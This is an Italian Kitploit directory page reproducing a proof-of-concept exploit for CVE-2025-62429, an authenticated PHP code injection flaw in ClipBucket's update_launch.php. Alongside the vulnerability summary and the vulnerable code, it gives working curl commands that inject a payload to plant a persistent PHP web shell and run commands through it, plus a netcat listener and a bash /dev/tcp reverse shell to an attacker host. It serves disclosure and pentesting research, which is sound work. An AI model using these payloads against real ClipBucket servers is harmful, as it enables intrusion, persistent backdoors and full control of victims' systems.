Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-62429 — CVE-2025-62429 | clipbucket RCE | Kitploit
Strumenti/GitHubGitHub/drkim-dev/cve-2025-62429
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingRed TeamingSviluppo Payload
GitHubdrkim-dev/cve-2025-62429

CVE-2025-62429

CVE-2025-62429 | clipbucket RCE

Vedi Repository
114 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-62429 PoC - RCE su clipbucket

Proof-of-Concept per RCE tramite Iniezione di Codice PHP in update_launch.php

Divulgazione: Segnalato originariamente da me tramite GHSA-3h9c-7j8r-xc3v

⚠️ Solo per uso autorizzato di pentesting/ricerca.

Informazioni sulla Vulnerabilità

CampoValore
CVE IDCVE-2025-62429
Gravità🔴 Alta
Punteggio CVSS7.2
Vettore CVSS[CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H]
CWECWE-78: Iniezione di Comandi del Sistema Operativo, CWE-94: Iniezione di Codice
Prodotto AffettoClibBucket <= 5.5.3 - #79
Versione Corretta5.5.3 - #80
AvvisoGHSA-3h9c-7j8r-xc3v

CVE-2025-62429: Esecuzione Remota di Codice (RCE) Autenticata tramite Iniezione di Codice PHP in update_launch.php

Riepilogo

Esiste una vulnerabilità di Esecuzione Remota di Codice (RCE) Autenticata in ClipBucket v5.5.3-61. La vulnerabilità è classificata come CWE-94: Controllo Improprio della Generazione di Codice ('Iniezione di Codice'). L'applicazione non riesce a sanificare correttamente l'input controllato dall'utente utilizzato per generare codice PHP eseguibile in update_launch.php. Un amministratore autenticato può sfruttare questa vulnerabilità per ottenere l'esecuzione completa di comandi sul server sottostante, aumentando i privilegi da amministratore web a utente di sistema (ad esempio, containeruser).


Dettagli

La vulnerabilità si trova in upload/admin_area/actions/update_launch.php. Questo script agevola gli aggiornamenti di sistema generando dinamicamente uno script PHP temporaneo in background.

Frammento di Codice Vulnerabile: upload/admin_area/actions/update_launch.php (Righe 40-86)

root@kitploit:~
// User input from $_POST['type'] is directly concatenated into a PHP string.
$data = '<?php
if (php_sapi_name() != \'cli\') { die; }
...
$type = \'' . $_POST['type'] . '\'; // <--- VULNERABILITY: Direct concatenation
...
?>';
fwrite($tmp_file, $data);
fclose($tmp_file);

// The generated file is executed via shell_exec using the PHP CLI.
$cmd = System::get_binaries('php') . ' -q ' . DirPath::get('temp') . 'update_core_tmp.php';
shell_exec($cmd);
immagine immagine

Meccanismo dello Sfruttamento: Poiché il parametro type viene concatenato nella stringa $data senza escape o sanificazione, un attaccante può utilizzare un apice singolo (') per uscire dal contesto letterale della stringa. Può quindi iniettare funzioni PHP arbitrarie (come system() o file_put_contents()) e commentare il resto del codice originale usando //. Ciò comporta l'esecuzione del codice fornito dall'attaccante con i privilegi del processo PHP-CLI.


Prerequisiti

  • Livello di Accesso: Privilegi amministrativi.
  • Autenticazione: Un cookie di sessione PHPSESSID valido. immagine

PoC (Proof of Concept)

Fase 1: Verifica e Distribuzione di Web Shell (Persistenza)

Dimostriamo prima la vulnerabilità distribuendo una web shell persistente nella root del documento.

  1. Invia una richiesta POST manipolata all'endpoint vulnerabile:
root@kitploit:~
curl -X POST "http://[TARGET_IP]/admin_area/actions/update_launch.php" \
-H "Cookie: PHPSESSID=[ADMIN_SESSION_ID]" \
-d "type=core'; file_put_contents(dirname(__DIR__, 2).'/vuln.php', '<?php system(\$_GET[\"cmd\"]); ?>'); //"
immagine
  1. Conferma l'esecuzione recuperando l'identità del sistema:
root@kitploit:~
curl -s "http://[TARGET_IP]/vuln.php?cmd=id"
# Risposta prevista: uid=1000(containeruser) gid=1000(containeruser) ...
Risposta prevista: uid=1000(containeruser) gid=1000(containeruser) ...

Fase 2: Reverse Shell (Controllo Completo del Sistema)

Dopo aver confermato la RCE, viene stabilita una shell interattiva per la post-esplorazione.

  1. Avvia un listener Netcat sulla macchina attaccante:
root@kitploit:~
nc -lvnp 4444
immagine
  1. Attiva la reverse shell attraverso la web shell distribuita:
root@kitploit:~
curl -G "http://[TARGET_IP]/vuln.php" \
--data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/[KALI_IP]/4444 0>&1'"
immagine immagine

La macchina attaccante riceve una connessione, concedendo accesso completo a una shell interattiva come containeruser.


Impatto

Uno sfruttamento riuscito consente a un attaccante di eseguire comandi di sistema arbitrari. Ciò comporta:

  • Accesso Completo ai Dati: Capacità di leggere file di configurazione sensibili (ad es., config.inc.php) e l'intero database.
  • Violazione dell'Integrità del Sistema: Modifica o cancellazione di qualsiasi file accessibile al processo del server web.
  • Movimento Laterale: L'host compromesso può fungere da punto di pivot per ulteriori attacchi all'interno dell'infrastruttura interna.

Avviso Correlato / Riferimento CVE

Questo problema è correlato alla vulnerabilità precedentemente divulgata:

  • GHSA-3x4g-x3gv-rjmq
  • CVE-2025-62429

Dopo ulteriori analisi, è stato scoperto che la vulnerabilità persiste in ClipBucket v5.5.3 a causa di una correzione incompleta.
Mentre l'avviso originale affrontava parte del problema, il vettore di iniezione di codice PHP tramite il parametro type in update_launch.php rimaneva sfruttabile.

Questo avviso fornisce dettagli tecnici aggiuntivi, verifica sull'ultima versione e uno scenario di sfruttamento completo end-to-end.

Scarica lo strumento